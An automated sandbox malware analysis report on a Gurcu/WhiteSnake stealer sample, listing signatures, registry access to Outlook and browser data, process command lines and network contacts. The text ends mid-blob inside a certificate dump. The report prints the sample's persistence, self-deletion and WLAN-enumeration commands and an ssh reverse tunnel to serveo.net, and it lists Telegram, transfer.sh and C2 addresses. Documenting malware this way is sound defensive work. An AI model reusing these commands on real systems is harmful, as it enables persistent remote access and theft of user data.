Malware Analysis Report

2024-10-19 06:43

Sample ID 230909-rach3sbf43
Target 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
Tags
gurcu collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

Threat Level: Known bad

The file 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection discovery spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu, WhiteSnake

Gurcu family

Deletes itself

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Checks installed software on the system

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Drops file in System32 directory

Enumerates physical storage devices

Checks processor information in registry

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

outlook_win_path

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Creates scheduled task(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-09 13:59

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-09 13:58

Reported

2023-09-09 14:01

Platform

win10v2004-20230831-en

Max time kernel

154s

Max time network

155s

Command Line

C:\Windows\System32\svchost.exe -k netsvcs -p

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{899F939A-FC9F-4822-A3C8-2481478AB348}.catalogItem C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\svchost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1416 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 1416 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 4944 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4944 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4944 wrote to memory of 4860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4944 wrote to memory of 4860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4944 wrote to memory of 1288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4944 wrote to memory of 1288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4944 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 4944 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2348 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 2348 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 3044 wrote to memory of 2156 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3044 wrote to memory of 2156 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3044 wrote to memory of 624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3044 wrote to memory of 624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3044 wrote to memory of 2728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 3044 wrote to memory of 2728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2348 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 2348 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 548 wrote to memory of 5068 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 548 wrote to memory of 5068 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 548 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 548 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 548 wrote to memory of 2996 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 548 wrote to memory of 2996 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2348 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2348 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\OpenSSH\ssh.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Processes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8664 serveo.net

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
N/A 127.0.0.1:8664 tcp
US 8.8.8.8:53 serveo.net udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 232.200.77.51.in-addr.arpa udp
US 8.8.8.8:53 11.78.23.94.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 tcp
FR 94.23.78.11:8080 tcp

Files

memory/1416-0-0x000001E3212B0000-0x000001E321312000-memory.dmp

memory/1416-2-0x00007FFBA4F60000-0x00007FFBA5A21000-memory.dmp

memory/1416-3-0x000001E3216E0000-0x000001E3216F0000-memory.dmp

memory/1416-7-0x00007FFBA4F60000-0x00007FFBA5A21000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/2348-18-0x00007FFBA4E30000-0x00007FFBA58F1000-memory.dmp

memory/2348-19-0x0000022C76A20000-0x0000022C76A30000-memory.dmp

memory/2348-22-0x00007FFBA4E30000-0x00007FFBA58F1000-memory.dmp

memory/2348-23-0x0000022C76A20000-0x0000022C76A30000-memory.dmp

memory/2348-24-0x0000022C76C70000-0x0000022C76E19000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-09 13:58

Reported

2023-09-09 14:01

Platform

win7-20230831-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d